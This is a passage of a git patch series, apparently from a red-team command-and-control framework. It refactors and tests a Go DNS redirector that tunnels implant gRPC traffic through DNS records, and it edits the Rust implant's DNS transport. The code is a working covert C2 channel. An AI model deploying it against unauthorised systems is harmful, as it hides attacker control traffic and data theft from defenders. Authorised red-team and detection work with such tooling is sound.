r.HandleEndPacket(ctx, upstream, convID, seq, queryType) case typeFetch: - responseData, err = r.handleFetchPacket(convID, seq) + responseData, err = r.HandleFetchPacket(convID, seq) default: err = fmt.Errorf("unknown packet type: %c", pktType) } @@ -309,9 +339,9 @@ func (r *Redirector) handleDNSQuery(ctx context.Context, conn *net.UDPConn, addr switch queryType { case txtRecordType: maxCapacity = maxDNSResponseSize - case 1: + case aRecordType: maxCapacity = 4 - case 28: + case aaaaRecordType: maxCapacity = 16 default: maxCapacity = maxDNSResponseSize @@ -327,11 +357,11 @@ func (r *Redirector) handleDNSQuery(ctx context.Context, conn *net.UDPConn, addr if pktType == typeInit { actualConvID = convID conv = &Conversation{ - id: actualConvID, - lastActivity: time.Now(), - responseData: responseData, - responseCRC: calculateCRC16(responseData), - isBinaryChunking: true, + ID: actualConvID, + LastActivity: time.Now(), + ResponseData: responseData, + ResponseCRC: CalculateCRC16(responseData), + IsBinaryChunking: true, } r.conversations.Store(actualConvID, conv) } else { @@ -347,44 +377,44 @@ func (r *Redirector) handleDNSQuery(ctx context.Context, conn *net.UDPConn, addr conv.mu.Lock() - conv.responseData = responseData - conv.responseCRC = calculateCRC16(responseData) - conv.isBinaryChunking = true + conv.ResponseData = responseData + conv.ResponseCRC = CalculateCRC16(responseData) + conv.IsBinaryChunking = true - conv.responseChunks = nil + conv.ResponseChunks = nil for i := 0; i < len(responseData); i += maxCapacity { end := i + maxCapacity if end > len(responseData) { end = len(responseData) } - conv.responseChunks = append(conv.responseChunks, string(responseData[i:end])) + conv.ResponseChunks = append(conv.ResponseChunks, string(responseData[i:end])) } conv.mu.Unlock() var response []byte if maxCapacity <= 4 { - if len(conv.responseChunks) > 65535 { - slog.Error("too many chunks for binary format", "chunks", len(conv.responseChunks)) + if len(conv.ResponseChunks) > 65535 { + slog.Error("too many chunks for binary format", "chunks", len(conv.ResponseChunks)) r.sendErrorResponse(conn, addr, transactionID) return } response = make([]byte, 4) response[0] = 0xFF - response[1] = byte(len(conv.responseChunks) >> 8) - response[2] = byte(len(conv.responseChunks) & 0xFF) - response[3] = byte(conv.responseCRC & 0xFF) + response[1] = byte(len(conv.ResponseChunks) >> 8) + response[2] = byte(len(conv.ResponseChunks) & 0xFF) + response[3] = byte(conv.ResponseCRC & 0xFF) slog.Debug("using compact binary chunked indicator", - "chunks", len(conv.responseChunks), "crc_low", response[3]) + "chunks", len(conv.ResponseChunks), "crc_low", response[3]) } else { - responseStr := fmt.Sprintf("%s%s:%s", respChunked, encodeSeq(len(conv.responseChunks)), encodeBase36CRC(int(conv.responseCRC))) + responseStr := fmt.Sprintf("%s%s:%s", respChunked, encodeSeq(len(conv.ResponseChunks)), EncodeBase36CRC(int(conv.ResponseCRC))) response = []byte(responseStr) } slog.Debug("response too large for record type, using multi-query chunking", "conv_id", actualConvID, "packet_type", string(pktType), "data_size", len(responseData), - "max_capacity", maxCapacity, "query_type", queryType, "chunks", len(conv.responseChunks), + "max_capacity", maxCapacity, "query_type", queryType, "chunks", len(conv.ResponseChunks), "indicator_size", len(response)) r.sendDNSResponse(conn, addr, transactionID, domain, response, queryType) @@ -399,9 +429,9 @@ func (r *Redirector) handleDNSQuery(ctx context.Context, conn *net.UDPConn, addr } } -// handleInitPacket processes init packet and creates conversation +// HandleInitPacket processes init packet and creates conversation // Init payload format: [method_code:2][total_chunks:5][crc:4] -func (r *Redirector) handleInitPacket(tempConvID string, data string) ([]byte, error) { +func (r *Redirector) HandleInitPacket(tempConvID string, data string) ([]byte, error) { slog.Debug("handling init packet", "temp_conv_id", tempConvID, "data", data, "data_len", len(data)) // Payload: method(2) + chunks(5) + crc(4) = 11 chars @@ -431,12 +461,12 @@ func (r *Redirector) handleInitPacket(tempConvID string, data string) ([]byte, e realConvID := generateConvID() conv := &Conversation{ - id: realConvID, - methodPath: methodPath, - totalChunks: totalChunks, - expectedCRC: uint16(expectedCRC), - chunks: make(map[int][]byte), - lastActivity: time.Now(), + ID: realConvID, + MethodPath: methodPath, + TotalChunks: totalChunks, + ExpectedCRC: uint16(expectedCRC), + Chunks: make(map[int][]byte), + LastActivity: time.Now(), } r.conversations.Store(realConvID, conv) @@ -446,8 +476,8 @@ func (r *Redirector) handleInitPacket(tempConvID string, data string) ([]byte, e return []byte(realConvID), nil } -// handleDataPacket stores a data chunk in the conversation -func (r *Redirector) handleDataPacket(convID string, seq int, data []byte) ([]byte, error) { +// HandleDataPacket stores a data chunk in the conversation +func (r *Redirector) HandleDataPacket(convID string, seq int, data []byte) ([]byte, error) { convVal, ok := r.conversations.Load(convID) if !ok { return nil, fmt.Errorf("unknown conversation: %s", convID) @@ -457,15 +487,15 @@ func (r *Redirector) handleDataPacket(convID string, seq int, data []byte) ([]by conv.mu.Lock() defer conv.mu.Unlock() - conv.lastActivity = time.Now() + conv.LastActivity = time.Now() // Ignore chunks beyond declared total (duplicates/retransmissions) - if seq >= conv.totalChunks { - slog.Warn("ignoring chunk beyond expected total", "conv_id", convID, "seq", seq, "expected_total", conv.totalChunks) + if seq >= conv.TotalChunks { + slog.Warn("ignoring chunk beyond expected total", "conv_id", convID, "seq", seq, "expected_total", conv.TotalChunks) return []byte{}, nil } - conv.chunks[seq] = data + conv.Chunks[seq] = data dataPreview := "" if len(data) > 0 { @@ -473,13 +503,13 @@ func (r *Redirector) handleDataPacket(convID string, seq int, data []byte) ([]by dataPreview = fmt.Sprintf("%x", data[:previewLen]) } - slog.Debug("received chunk", "conv_id", convID, "seq", seq, "chunk_len", len(data), "total_received", len(conv.chunks), "expected_total", conv.totalChunks, "data_preview", dataPreview) + slog.Debug("received chunk", "conv_id", convID, "seq", seq, "chunk_len", len(data), "total_received", len(conv.Chunks), "expected_total", conv.TotalChunks, "data_preview", dataPreview) return []byte{}, nil } -// handleEndPacket processes end packet and returns server response -func (r *Redirector) handleEndPacket(ctx context.Context, upstream *grpc.ClientConn, convID string, lastSeq int, queryType uint16) ([]byte, error) { +// HandleEndPacket processes end packet and returns server response +func (r *Redirector) HandleEndPacket(ctx context.Context, upstream *grpc.ClientConn, convID string, lastSeq int, queryType uint16) ([]byte, error) { convVal, ok := r.conversations.Load(convID) if !ok { return nil, fmt.Errorf("unknown conversation: %s", convID) @@ -489,14 +519,14 @@ func (r *Redirector) handleEndPacket(ctx context.Context, upstream *grpc.ClientC conv.mu.Lock() defer conv.mu.Unlock() - conv.lastActivity = time.Now() + conv.LastActivity = time.Now() - slog.Debug("end packet received", "conv_id", convID, "last_seq", lastSeq, "chunks_received", len(conv.chunks)) + slog.Debug("end packet received", "conv_id", convID, "last_seq", lastSeq, "chunks_received", len(conv.Chunks)) // Check for missing chunks var missing []int - for i := 0; i < conv.totalChunks; i++ { - if _, ok := conv.chunks[i]; !ok { + for i := 0; i < conv.TotalChunks; i++ { + if _, ok := conv.Chunks[i]; !ok { missing = append(missing, i) } } @@ -515,31 +545,31 @@ func (r *Redirector) handleEndPacket(ctx context.Context, upstream *grpc.ClientC } // Reassemble data (chunks now contain raw binary, not base32) - requestData := r.reassembleChunks(conv.chunks, conv.totalChunks) + requestData := r.reassembleChunks(conv.Chunks, conv.TotalChunks) // Sanity check: ensure we have exactly the right number of chunks - if len(conv.chunks) != conv.totalChunks { - slog.Error("chunk count mismatch", "conv_id", convID, "chunks_in_map", len(conv.chunks), "total_chunks_declared", conv.totalChunks) - return []byte(respError + fmt.Sprintf("chunk_count_mismatch: have %d, expected %d", len(conv.chunks), conv.totalChunks)), nil + if len(conv.Chunks) != conv.TotalChunks { + slog.Error("chunk count mismatch", "conv_id", convID, "chunks_in_map", len(conv.Chunks), "total_chunks_declared", conv.TotalChunks) + return []byte(respError + fmt.Sprintf("chunk_count_mismatch: have %d, expected %d", len(conv.Chunks), conv.TotalChunks)), nil } slog.Debug("reassembled data", "conv_id", convID, "bytes_len", len(requestData)) // Verify CRC (chunks already contain raw decrypted data) - actualCRC := calculateCRC16(requestData) - expectedCRC := uint16(conv.expectedCRC) + actualCRC := CalculateCRC16(requestData) + expectedCRC := uint16(conv.ExpectedCRC) - slog.Debug("CRC check", "conv_id", convID, "expected", expectedCRC, "actual", actualCRC, "data_len", len(requestData), "chunks_received", len(conv.chunks), "chunks_expected", conv.totalChunks) + slog.Debug("CRC check", "conv_id", convID, "expected", expectedCRC, "actual", actualCRC, "data_len", len(requestData), "chunks_received", len(conv.Chunks), "chunks_expected", conv.TotalChunks) if actualCRC != expectedCRC { errMsg := fmt.Sprintf("CRC mismatch: expected %d, got %d", expectedCRC, actualCRC) - slog.Error(errMsg, "conv_id", convID, "data_len", len(requestData), "chunks_map_size", len(conv.chunks), "total_chunks_declared", conv.totalChunks) + slog.Error(errMsg, "conv_id", convID, "data_len", len(requestData), "chunks_map_size", len(conv.Chunks), "total_chunks_declared", conv.TotalChunks) return []byte(respError + "invalid_crc"), nil } slog.Debug("reassembled and validated data", "conv_id", convID, "bytes", len(requestData)) // Forward to upstream gRPC server - responseData, err := r.forwardToUpstream(ctx, upstream, conv.methodPath, requestData) + responseData, err := r.forwardToUpstream(ctx, upstream, conv.MethodPath, requestData) if err != nil { return nil, fmt.Errorf("failed to forward to upstream: %w", err) } @@ -547,7 +577,7 @@ func (r *Redirector) handleEndPacket(ctx context.Context, upstream *grpc.ClientC // Determine if we need to base32-encode the response // For A/AAAA records that will use binary chunking, return raw binary // For TXT records, return base32-encoded with "ok:" prefix - useBinaryChunking := (queryType == 1 || queryType == 28) // A or AAAA record + useBinaryChunking := (queryType == aRecordType || queryType == aaaaRecordType) if useBinaryChunking { // Return raw binary data for A/AAAA records @@ -564,32 +594,30 @@ func (r *Redirector) handleEndPacket(ctx context.Context, upstream *grpc.ClientC slog.Debug("response too large, chunking", "conv_id", convID, "size", len(responseData), "encoded_size", len(encodedResponse)) // Store response data in conversation - conv.responseData = responseData - conv.responseCRC = calculateCRC16(responseData) // Use full 16-bit CRC + conv.ResponseData = responseData + conv.ResponseCRC = CalculateCRC16(responseData) // Use full 16-bit CRC // Chunk the encoded response - conv.responseChunks = nil + conv.ResponseChunks = nil for i := 0; i < len(encodedResponse); i += maxResponseChunkSize { end := i + maxResponseChunkSize if end > len(encodedResponse) { end = len(encodedResponse) } - conv.responseChunks = append(conv.responseChunks, encodedResponse[i:end]) + conv.ResponseChunks = append(conv.ResponseChunks, encodedResponse[i:end]) } // Return chunked response indicator: "r:[num_chunks]:[crc]" - response := fmt.Sprintf("%s%s:%s", respChunked, encodeSeq(len(conv.responseChunks)), encodeBase36CRC(int(conv.responseCRC))) - slog.Debug("returning chunked response indicator", "conv_id", convID, "chunks", len(conv.responseChunks), "crc", conv.responseCRC) // Don't delete conversation yet - client will fetch chunks + response := fmt.Sprintf("%s%s:%s", respChunked, encodeSeq(len(conv.ResponseChunks)), EncodeBase36CRC(int(conv.ResponseCRC))) + slog.Debug("returning chunked response indicator", "conv_id", convID, "chunks", len(conv.ResponseChunks), "crc", conv.ResponseCRC) return []byte(response), nil } - // Return success with response - // Note: Conversation will be deleted by the main handler after successful send return []byte(responseWithPrefix), nil } -// handleFetchPacket serves a response chunk to the client -func (r *Redirector) handleFetchPacket(convID string, chunkSeq int) ([]byte, error) { +// HandleFetchPacket serves a response chunk to the client +func (r *Redirector) HandleFetchPacket(convID string, chunkSeq int) ([]byte, error) { convVal, ok := r.conversations.Load(convID) if !ok { return nil, fmt.Errorf("unknown conversation: %s", convID) @@ -599,10 +627,10 @@ func (r *Redirector) handleFetchPacket(convID string, chunkSeq int) ([]byte, err conv.mu.Lock() defer conv.mu.Unlock() - conv.lastActivity = time.Now() + conv.LastActivity = time.Now() // Check if this is the final fetch (cleanup request) - if chunkSeq >= len(conv.responseChunks) { + if chunkSeq >= len(conv.ResponseChunks) { // Client is done fetching - clean up conversation r.conversations.Delete(convID) slog.Debug("conversation completed and cleaned up", "conv_id", convID) @@ -610,16 +638,16 @@ func (r *Redirector) handleFetchPacket(convID string, chunkSeq int) ([]byte, err } // Return the requested chunk - if chunkSeq < 0 || chunkSeq >= len(conv.responseChunks) { - return nil, fmt.Errorf("invalid chunk sequence: %d (total: %d)", chunkSeq, len(conv.responseChunks)) + if chunkSeq < 0 || chunkSeq >= len(conv.ResponseChunks) { + return nil, fmt.Errorf("invalid chunk sequence: %d (total: %d)", chunkSeq, len(conv.ResponseChunks)) } - chunk := conv.responseChunks[chunkSeq] - slog.Debug("serving response chunk", "conv_id", convID, "seq", chunkSeq, "size", len(chunk), "is_binary", conv.isBinaryChunking) + chunk := conv.ResponseChunks[chunkSeq] + slog.Debug("serving response chunk", "conv_id", convID, "seq", chunkSeq, "size", len(chunk), "is_binary", conv.IsBinaryChunking) // For binary chunking (A/AAAA), return raw bytes // For text chunking (TXT), return "ok:" prefix + base32 data - if conv.isBinaryChunking { + if conv.IsBinaryChunking { return []byte(chunk), nil } return []byte(respOK + chunk), nil @@ -740,30 +768,6 @@ func (r *Redirector) forwardToUpstream(ctx context.Context, upstream *grpc.Clien return responseData, nil } -// parseDomainName extracts the domain name from a DNS query -func (r *Redirector) parseDomainName(data []byte) (string, error) { - var labels []string - offset := 0 - - for offset < len(data) { - length := int(data[offset]) - if length == 0 { - break - } - offset++ - - if offset+length > len(data) { - return "", fmt.Errorf("invalid label length") - } - - label := string(data[offset : offset+length]) - labels = append(labels, label) - offset += length - } - - return strings.Join(labels, "."), nil -} - // parseDomainNameAndType extracts both domain name and query type from DNS question func (r *Redirector) parseDomainNameAndType(data []byte) (string, uint16, error) { var labels []string @@ -861,12 +865,12 @@ func (r *Redirector) sendDNSResponse(conn *net.UDPConn, addr *net.UDPAddr, trans rdata = append(rdata, chunk...) } - case 1: // A record (4 bytes capacity) + case aRecordType: // Pad to 4 bytes (data already validated to fit) rdata = make([]byte, 4) copy(rdata, data) - case 28: // AAAA record (16 bytes capacity) + case aaaaRecordType: // Pad to 16 bytes (data already validated to fit) rdata = make([]byte, 16) copy(rdata, data) @@ -933,23 +937,19 @@ func codeToMethod(code string) string { return "/c2.C2/ClaimTasks" } -// encodeSeq encodes sequence number to 5-digit base36 (max: 60,466,175) -func encodeSeq(seq int) string { +// encodeBase36 encodes an integer to base36 string with specified number of digits +func encodeBase36(value int, digits int) string { const base36 = "0123456789abcdefghijklmnopqrstuvwxyz" - digit4 := (seq / 1679616) % 36 // 36^4 - digit3 := (seq / 46656) % 36 // 36^3 - digit2 := (seq / 1296) % 36 // 36^2 - digit1 := (seq / 36) % 36 // 36^1 - digit0 := seq % 36 // 36^0 - return string([]byte{base36[digit4], base36[digit3], base36[digit2], base36[digit1], base36[digit0]}) -} - -// decodeSeq decodes 5-character base36 sequence number -func decodeSeq(encoded string) (int, error) { - if len(encoded) != 5 { - return 0, fmt.Errorf("invalid sequence length: expected 5, got %d", len(encoded)) + result := make([]byte, digits) + for i := digits - 1; i >= 0; i-- { + result[i] = base36[value%36] + value /= 36 } + return string(result) +} +// decodeBase36 decodes a base36 string to an integer +func decodeBase36(encoded string) (int, error) { val := func(c byte) (int, error) { switch { case c >= '0' && c <= '9': @@ -961,27 +961,33 @@ func decodeSeq(encoded string) (int, error) { } } - d4, _ := val(encoded[0]) - d3, _ := val(encoded[1]) - d2, _ := val(encoded[2]) - d1, _ := val(encoded[3]) - d0, err := val(encoded[4]) - if err != nil { - return 0, err + result := 0 + for _, c := range []byte(encoded) { + digit, err := val(c) + if err != nil { + return 0, err + } + result = result*36 + digit } + return result, nil +} - return d4*1679616 + d3*46656 + d2*1296 + d1*36 + d0, nil +// encodeSeq encodes sequence number to 5-digit base36 (max: 60,466,175) +func encodeSeq(seq int) string { + return encodeBase36(seq, 5) } -// encodeBase36CRC encodes CRC16 to 4-digit base36 (range: 0-1,679,615 covers 0-65,535) -// Used only for init packet payload and chunked response metadata -func encodeBase36CRC(crc int) string { - const base36 = "0123456789abcdefghijklmnopqrstuvwxyz" - digit3 := (crc / 46656) % 36 // 36^3 - digit2 := (crc / 1296) % 36 // 36^2 - digit1 := (crc / 36) % 36 // 36^1 - digit0 := crc % 36 // 36^0 - return string([]byte{base36[digit3], base36[digit2], base36[digit1], base36[digit0]}) +// decodeSeq decodes 5-character base36 sequence number +func decodeSeq(encoded string) (int, error) { + if len(encoded) != 5 { + return 0, fmt.Errorf("invalid sequence length: expected 5, got %d", len(encoded)) + } + return decodeBase36(encoded) +} + +// EncodeBase36CRC encodes CRC16 to 4-digit base36 (range: 0-1,679,615 covers 0-65,535) +func EncodeBase36CRC(crc int) string { + return encodeBase36(crc, 4) } // decodeBase36CRC decodes 4-character base36 CRC value @@ -989,31 +995,11 @@ func decodeBase36CRC(encoded string) (int, error) { if len(encoded) != 4 { return 0, fmt.Errorf("invalid CRC length: expected 4, got %d", len(encoded)) } - - val := func(c byte) (int, error) { - switch { - case c >= '0' && c <= '9': - return int(c - '0'), nil - case c >= 'a' && c <= 'z': - return int(c-'a') + 10, nil - default: - return 0, fmt.Errorf("invalid base36 character: %c", c) - } - } - - d3, _ := val(encoded[0]) - d2, _ := val(encoded[1]) - d1, _ := val(encoded[2]) - d0, err := val(encoded[3]) - if err != nil { - return 0, err - } - - return d3*46656 + d2*1296 + d1*36 + d0, nil + return decodeBase36(encoded) } -// calculateCRC16 computes CRC16-CCITT checksum (polynomial 0x1021, init 0xFFFF) -func calculateCRC16(data []byte) uint16 { +// CalculateCRC16 computes CRC16-CCITT checksum (polynomial 0x1021, init 0xFFFF) +func CalculateCRC16(data []byte) uint16 { var crc uint16 = 0xFFFF for _, b := range data { crc ^= uint16(b) << 8 diff --git a/tavern/internal/redirectors/dns/dns_test.go b/tavern/internal/redirectors/dns/dns_test.go new file mode 100644 index 000000000..9ce1a8cf5 --- /dev/null +++ b/tavern/internal/redirectors/dns/dns_test.go @@ -0,0 +1,337 @@ +package dns_test + +import ( + "context" + "net" + "testing" + "time" + + "github.com/stretchr/testify/assert" + "github.com/stretchr/testify/require" + "google.golang.org/grpc" + "google.golang.org/grpc/credentials/insecure" + + dnsredirector "realm.pub/tavern/internal/redirectors/dns" +) + +// TestParseListenAddr tests the parseListenAddr function +func TestParseListenAddr(t *testing.T) { + t.Run("default port with multiple domains", func(t *testing.T) { + addr, domains, err := dnsredirector.ParseListenAddr("0.0.0.0?domain=example.com&domain=foo.bar") + require.NoError(t, err) + assert.Equal(t, "0.0.0.0:53", addr) + assert.ElementsMatch(t, []string{"example.com", "foo.bar"}, domains) + }) + + t.Run("custom port with single domain", func(t *testing.T) { + addr, domains, err := dnsredirector.ParseListenAddr("127.0.0.1:8053?domain=example.com") + require.NoError(t, err) + assert.Equal(t, "127.0.0.1:8053", addr) + assert.ElementsMatch(t, []string{"example.com"}, domains) + }) + + t.Run("malformed domain value", func(t *testing.T) { + _, _, err := dnsredirector.ParseListenAddr("127.0.0.1:8053?domain=%ZZ") + assert.Error(t, err) + assert.Contains(t, err.Error(), "decode domain") + }) + + t.Run("no query params", func(t *testing.T) { + addr, domains, err := dnsredirector.ParseListenAddr("0.0.0.0:5353") + require.NoError(t, err) + assert.Equal(t, "0.0.0.0:5353", addr) + assert.Empty(t, domains) + }) +} + +// newTestRedirector creates a test redirector with stubbed upstream +func newTestRedirector() *dnsredirector.Redirector { + return &dnsredirector.Redirector{} +} + +// TestInitDataEndLifecycle tests the complete packet handling flow +func TestInitDataEndLifecycle(t *testing.T) { + r := newTestRedirector() + + // Step 1: Send init packet + // Init payload: [method_code:2][total_chunks:5][crc:4] + methodCode := "ct" // ClaimTasks + totalChunksStr := "00002" // 2 chunks (base36) + testData := []byte{0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08} + crc := dnsredirector.CalculateCRC16(testData) + crcStr := dnsredirector.EncodeBase36CRC(int(crc)) + + initPayload := methodCode + totalChunksStr + crcStr + tempConvID := "temp12345678" + + convID, err := r.HandleInitPacket(tempConvID, initPayload) + require.NoError(t, err) + assert.NotEmpty(t, convID) + assert.Len(t, convID, 12) // CONV_ID_SIZE + + convIDStr := string(convID) + + // Verify conversation was created + conv, ok := r.GetConversation(convIDStr) + require.True(t, ok) + assert.Equal(t, "/c2.C2/ClaimTasks", conv.MethodPath) + assert.Equal(t, 2, conv.TotalChunks) + assert.Equal(t, crc, conv.ExpectedCRC) + + // Step 2: Send data chunks + chunk0 := testData[:4] + chunk1 := testData[4:] + + _, err = r.HandleDataPacket(convIDStr, 0, chunk0) + require.NoError(t, err) + + _, err = r.HandleDataPacket(convIDStr, 1, chunk1) + require.NoError(t, err) + + // Verify chunks were stored + conv, _ = r.GetConversation(convIDStr) + assert.Len(t, conv.Chunks, 2) + + // Step 3: Send end packet with stub upstream + ctx := context.Background() + stubUpstream := newStubUpstream(t, testData) + defer stubUpstream.Close() + + responseData, err := r.HandleEndPacket(ctx, stubUpstream.ClientConn(), convIDStr, 1, 16) // queryType=16 (TXT) + require.NoError(t, err) + assert.Contains(t, string(responseData), "ok:") +} + +// TestHandleDataPacketUnknownConversation tests error handling for unknown conversation +func TestHandleDataPacketUnknownConversation(t *testing.T) { + r := newTestRedirector() + + _, err := r.HandleDataPacket("nonexistent", 0, []byte{0x01, 0x02}) + assert.Error(t, err) + assert.Contains(t, err.Error(), "unknown conversation") +} + +// TestHandleFetchPacket tests response chunk fetching +func TestHandleFetchPacket(t *testing.T) { + r := newTestRedirector() + + t.Run("fetch chunk within bounds - text chunking", func(t *testing.T) { + convID := "test12345678" + conv := &dnsredirector.Conversation{ + ID: convID, + ResponseChunks: []string{"chunk0", "chunk1", "chunk2"}, + IsBinaryChunking: false, + LastActivity: time.Now(), + } + r.StoreConversation(convID, conv) + + // Fetch chunk 1 + data, err := r.HandleFetchPacket(convID, 1) + require.NoError(t, err) + assert.Equal(t, "ok:chunk1", string(data)) + + // Conversation should still exist + _, ok := r.GetConversation(convID) + assert.True(t, ok) + }) + + t.Run("fetch chunk within bounds - binary chunking", func(t *testing.T) { + convID := "bin123456789" + conv := &dnsredirector.Conversation{ + ID: convID, + ResponseChunks: []string{string([]byte{0x01, 0x02}), string([]byte{0x03, 0x04})}, + IsBinaryChunking: true, + LastActivity: time.Now(), + } + r.StoreConversation(convID, conv) + + // Fetch chunk 0 + data, err := r.HandleFetchPacket(convID, 0) + require.NoError(t, err) + assert.Equal(t, []byte{0x01, 0x02}, data) + }) + + t.Run("fetch beyond bounds triggers cleanup", func(t *testing.T) { + convID := "cleanup12345" + conv := &dnsredirector.Conversation{ + ID: convID, + ResponseChunks: []string{"chunk0"}, + IsBinaryChunking: false, + LastActivity: time.Now(), + } + r.StoreConversation(convID, conv) + + // Fetch seq beyond bounds + data, err := r.HandleFetchPacket(convID, 1) + require.NoError(t, err) + assert.Equal(t, "ok:", string(data)) + + // Conversation should be deleted + _, ok := r.GetConversation(convID) + assert.False(t, ok) + }) + + t.Run("fetch from unknown conversation", func(t *testing.T) { + _, err := r.HandleFetchPacket("unknown", 0) + assert.Error(t, err) + assert.Contains(t, err.Error(), "unknown conversation") + }) +} + +// TestCleanupConversations tests conversation expiration +func TestCleanupConversations(t *testing.T) { + r := newTestRedirector() + + // Create stale conversation (old timestamp) + staleConvID := "stale1234567" + staleConv := &dnsredirector.Conversation{ + ID: staleConvID, + LastActivity: time.Now().Add(-20 * time.Minute), // Older than timeout + } + r.StoreConversation(staleConvID, staleConv) + + // Create fresh conversation + freshConvID := "fresh1234567" + freshConv := &dnsredirector.Conversation{ + ID: freshConvID, + LastActivity: time.Now(), + } + r.StoreConversation(freshConvID, freshConv) + + // Run cleanup once + r.CleanupConversationsOnce(15 * time.Minute) + + // Verify stale conversation was removed + _, ok := r.GetConversation(staleConvID) + assert.False(t, ok, "stale conversation should be removed") + + // Verify fresh conversation remains + _, ok = r.GetConversation(freshConvID) + assert.True(t, ok, "fresh conversation should remain") +} + +// TestHandleEndPacketMissingChunks tests missing chunk detection +func TestHandleEndPacketMissingChunks(t *testing.T) { + r := newTestRedirector() + + // Create conversation with init + methodCode := "ct" + totalChunksStr := "00003" // 3 chunks + testData := []byte{0x01, 0x02, 0x03, 0x04, 0x05, 0x06} + crc := dnsredirector.CalculateCRC16(testData) + crcStr := dnsredirector.EncodeBase36CRC(int(crc)) + initPayload := methodCode + totalChunksStr + crcStr + + convID, err := r.HandleInitPacket("temp", initPayload) + require.NoError(t, err) + + convIDStr := string(convID) + + // Only send chunks 0 and 2 (skip chunk 1) + _, err = r.HandleDataPacket(convIDStr, 0, []byte{0x01, 0x02}) + require.NoError(t, err) + _, err = r.HandleDataPacket(convIDStr, 2, []byte{0x05, 0x06}) + require.NoError(t, err) + + // Send end packet + ctx := context.Background() + stubUpstream := newStubUpstream(t, testData) + defer stubUpstream.Close() + + responseData, err := r.HandleEndPacket(ctx, stubUpstream.ClientConn(), convIDStr, 2, 16) + require.NoError(t, err) + + // Should return missing chunks list + assert.Contains(t, string(responseData), "m:") + assert.Contains(t, string(responseData), "00001") // Missing chunk 1 in base36 +} + +// stubUpstream provides a minimal gRPC server for testing +type stubUpstream struct { + server *grpc.Server + clientConn *grpc.ClientConn + t *testing.T +} + +func newStubUpstream(t *testing.T, echoData []byte) *stubUpstream { + t.Helper() + + // Create a simple handler that echoes back the request + handler := func(srv any, stream grpc.ServerStream) error { + var reqBytes []byte + if err := stream.RecvMsg(&reqBytes); err != nil { + return err + } + + // Echo back the request data + return stream.SendMsg(echoData) + } + + server := grpc.NewServer(grpc.UnknownServiceHandler(handler)) + + // Start server on random port + listener, err := testListener(t) + require.NoError(t, err) + + go func() { + if err := server.Serve(listener); err != nil && err != grpc.ErrServerStopped { + t.Logf("stub server error: %v", err) + } + }() + + // Create client connection + conn, err := grpc.Dial(listener.Addr().String(), grpc.WithTransportCredentials(insecure.NewCredentials())) + require.NoError(t, err) + + return &stubUpstream{ + server: server, + clientConn: conn, + t: t, + } +} + +func (s *stubUpstream) ClientConn() *grpc.ClientConn { + return s.clientConn +} + +func (s *stubUpstream) Close() { + s.clientConn.Close() + s.server.Stop() +} + +func testListener(t *testing.T) (net.Listener, error) { + t.Helper() + return net.Listen("tcp", "127.0.0.1:0") +} + +// TestCRCMismatch tests CRC validation failure +func TestCRCMismatch(t *testing.T) { + r := newTestRedirector() + + // Create conversation with wrong CRC + methodCode := "ct" + totalChunksStr := "00001" + wrongCRC := dnsredirector.EncodeBase36CRC(12345) // Wrong CRC + initPayload := methodCode + totalChunksStr + wrongCRC + + convID, err := r.HandleInitPacket("temp", initPayload) + require.NoError(t, err) + + convIDStr := string(convID) + + // Send data with different content + actualData := []byte{0xFF, 0xFF, 0xFF, 0xFF} + _, err = r.HandleDataPacket(convIDStr, 0, actualData) + require.NoError(t, err) + + // Send end packet + ctx := context.Background() + stubUpstream := newStubUpstream(t, actualData) + defer stubUpstream.Close() + + responseData, err := r.HandleEndPacket(ctx, stubUpstream.ClientConn(), convIDStr, 0, 16) + require.NoError(t, err) + + // Should return CRC error + assert.Contains(t, string(responseData), "e:invalid_crc") +} From 518b3843a7dc357f38a7f1b1ea04a9f9ed53d9a1 Mon Sep 17 00:00:00 2001 From: KaliPatriot <43020092+KaliPatriot@users.noreply.github.com> Date: Fri, 5 Dec 2025 22:44:40 -0600 Subject: [PATCH 03/17] Fixed DNS resolver to use local system resolver --- implants/lib/transport/Cargo.toml | 2 +- implants/lib/transport/src/dns.rs | 379 +++++++++++++++++-------- tavern/internal/redirectors/dns/dns.go | 39 +++ 3 files changed, 293 insertions(+), 127 deletions(-) diff --git a/implants/lib/transport/Cargo.toml b/implants/lib/transport/Cargo.toml index 266e6305c..a13831abb 100644 --- a/implants/lib/transport/Cargo.toml +++ b/implants/lib/transport/Cargo.toml @@ -8,7 +8,7 @@ default = [] grpc = [] grpc-doh = ["grpc", "dep:hickory-resolver"] http1 = [] -dns = ["dep:data-encoding", "dep:rand"] +dns = ["dep:data-encoding", "dep:rand", "dep:hickory-resolver"] mock = ["dep:mockall"] [dependencies] diff --git a/implants/lib/transport/src/dns.rs b/implants/lib/transport/src/dns.rs index cf40bcda9..b4f496105 100644 --- a/implants/lib/transport/src/dns.rs +++ b/implants/lib/transport/src/dns.rs @@ -4,6 +4,9 @@ use prost::Message; use std::sync::mpsc::{Receiver, Sender}; use tokio::net::UdpSocket; +#[cfg(feature = "dns")] +use hickory_resolver::system_conf::read_system_conf; + use crate::Transport; // DNS protocol limits @@ -40,8 +43,10 @@ const RESP_CHUNKED: &str = "r:"; // Response chunked metadata const MAX_RETRIES: usize = 5; const INIT_TIMEOUT_SECS: u64 = 15; const CHUNK_TIMEOUT_SECS: u64 = 20; -const EXCHANGE_MAX_RETRIES: usize = 5; -const EXCHANGE_RETRY_DELAY_SECS: u64 = 3; + +// DNS query configuration +const MAX_DNS_PACKET_SIZE: usize = 4096; // Maximum DNS response size +const DNS_QUERY_TIMEOUT_SECS: u64 = 5; // Timeout for individual DNS queries // gRPC method paths static CLAIM_TASKS_PATH: &str = "/c2.C2/ClaimTasks"; @@ -67,6 +72,52 @@ where pb::xchacha::decode_with_chacha::(data) } +/// Build resolver array: system DNS servers (if available) + fallback servers +/// Returns array with system servers first, then 1.1.1.1:53, then 8.8.8.8:53 +/// If system config fails, returns only [1.1.1.1:53, 8.8.8.8:53] +fn build_resolver_array() -> Vec { + let mut resolvers = Vec::new(); + + // Try to get system DNS servers + #[cfg(feature = "dns")] + match read_system_conf() { + Ok((config, _opts)) => { + // Extract nameserver addresses from system config + for ns in config.name_servers() { + let addr = ns.socket_addr; + let server = format!("{}:{}", addr.ip(), addr.port()); + + // Only add if not already in the list (deduplicate) + if !resolvers.contains(&server) { + resolvers.push(server); + } + } + + #[cfg(debug_assertions)] + if !resolvers.is_empty() { + log::debug!("Found {} system DNS servers: {:?}", resolvers.len(), resolvers); + } else { + log::debug!("System DNS config returned no servers"); + } + } + Err(_e) => { + #[cfg(debug_assertions)] + log::debug!("Failed to 